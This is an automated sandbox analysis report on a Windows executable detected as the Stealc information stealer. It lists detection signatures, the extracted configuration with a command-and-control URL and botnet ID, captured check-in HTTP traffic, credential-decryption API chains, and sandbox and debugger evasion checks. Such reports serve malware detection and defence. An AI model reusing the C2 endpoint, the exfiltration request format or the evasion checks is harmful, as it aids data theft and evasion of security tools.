Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532502
MD5:33f53a09cb02c7459d8723408c86ebbe
SHA1:db007d0f88f66d60e9740ac561ee622ed65fd936
SHA256:e0e099a250b184d85c84fff09038ae8efa95f967143811bb72032d36f5eb30c0
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 33F53A09CB02C7459D8723408C86EBBE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2072556856.000000000106E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1751441710.0000000004DC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7472JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7472JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.3d0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-13T13:59:37.994165+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.3d0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37//QVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php?Virustotal: Detection: 20%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpCVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpwVirustotal: Detection: 16%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_003DC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_003D7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_003D9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_003D9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_003E8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003E38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003E4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_003DDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_003DE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_003DED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_003E4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003DDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_003DBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003DF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_003E3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003D16D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCBHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 41 39 34 46 32 38 36 39 36 37 39 34 33 34 30 30 30 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="hwid"E6A94F286967943400063------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="build"doma------CFHDHIJDGCBAKFIEGHCB--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_003D4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCBHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 41 39 34 46 32 38 36 39 36 37 39 34 33 34 30 30 30 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="hwid"E6A94F286967943400063------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="build"doma------CFHDHIJDGCBAKFIEGHCB--
                Source: file.exe, 00000000.00000002.2072556856.000000000106E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/(Q
                Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37//Q
                Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/6Q
                Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
                Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpC
                Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw
                Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007189450_2_00718945
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079A9460_2_0079A946
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067EA6E0_2_0067EA6E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067BAB40_2_0067BAB4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079BAA40_2_0079BAA4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00791B190_2_00791B19
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00787BC10_2_00787BC1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00793C7A0_2_00793C7A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008984FD0_2_008984FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079D4DC0_2_0079D4DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A0D6C0_2_006A0D6C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007865D20_2_007865D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00798E470_2_00798E47
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007896A80_2_007896A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0078B7790_2_0078B779
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008217050_2_00821705
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007437E90_2_007437E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079FFBA0_2_0079FFBA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0078EF9C0_2_0078EF9C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0078D78A0_2_0078D78A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006937900_2_00693790
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 003D45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: midxwoqt ZLIB complexity 0.9945646666537986
                Source: file.exe, 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1751441710.0000000004DC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_003E9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_003E3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\2YTZ3CYY.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1814528 > 1048576
                Source: file.exeStatic PE information: Raw size of midxwoqt is bigger than: 0x100000 < 0x194c00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.3d0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;midxwoqt:EW;dekzctjc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;midxwoqt:EW;dekzctjc:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003E9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c21c2 should be: 0x1c6db7
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: midxwoqt
                Source: file.exeStatic PE information: section name: dekzctjc
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DB06F push esi; mov dword ptr [esp], 68FB6FC6h0_2_006DB0C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DB06F push 073338D5h; mov dword ptr [esp], edx0_2_006DB12A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003EB035 push ecx; ret 0_2_003EB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00850893 push eax; mov dword ptr [esp], esi0_2_008508C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00850893 push ebx; mov dword ptr [esp], 71181D81h0_2_008508E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00850893 push ebx; mov dword ptr [esp], edi0_2_00850942
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F8831 push edi; mov dword ptr [esp], ebp0_2_007F8859
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D300D push ecx; mov dword ptr [esp], ebx0_2_007D3044
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D300D push ebx; mov dword ptr [esp], ebp0_2_007D3253
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AE010 push edi; mov dword ptr [esp], edx0_2_008AE03A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00817021 push 6D582796h; mov dword ptr [esp], edx0_2_00817061
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00817021 push edi; mov dword ptr [esp], 76F7B661h0_2_00817090
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087B841 push edi; mov dword ptr [esp], ecx0_2_0087BEBE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083C9A5 push 796FF150h; mov dword ptr [esp], ebp0_2_0083CA63
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00718945 push 6DF12072h; mov dword ptr [esp], ecx0_2_007189A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00718945 push edi; mov dword ptr [esp], eax0_2_00718A3D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00718945 push edi; mov dword ptr [esp], 00000000h0_2_00718A44
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00718945 push edi; mov dword ptr [esp], edx0_2_00718AAA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081A9B7 push 543ED457h; mov dword ptr [esp], ecx0_2_0081A9FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080B9BA push 28340AEDh; mov dword ptr [esp], eax0_2_0080B9E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079A946 push edx; mov dword ptr [esp], 37F146D8h0_2_0079AA1C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079A946 push 45E97ECBh; mov dword ptr [esp], esi0_2_0079AA46
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079A946 push edi; mov dword ptr [esp], ebx0_2_0079AA5B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079A946 push ecx; mov dword ptr [esp], 7BEEC700h0_2_0079AA5F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079A946 push 59C2F190h; mov dword ptr [esp], esi0_2_0079AA73
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079A946 push eax; mov dword ptr [esp], ebp0_2_0079AAD5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079A946 push edi; mov dword ptr [esp], esi0_2_0079AAF9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079A946 push 053F98BCh; mov dword ptr [esp], ebx0_2_0079AB0F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079A946 push ecx; mov dword ptr [esp], edi0_2_0079ABD8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079A946 push 15AA56A6h; mov dword ptr [esp], ebp0_2_0079ACEB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079A946 push edi; mov dword ptr [esp], edx0_2_0079AD87
                Source: file.exeStatic PE information: section name: midxwoqt entropy: 7.953836715347976

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003E9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13659
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A400C second address: 7A4010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A329A second address: 7A32A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A32A2 second address: 7A32D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C6956DA54h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6C6956DA59h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A32D8 second address: 7A32DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A32DC second address: 7A32E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
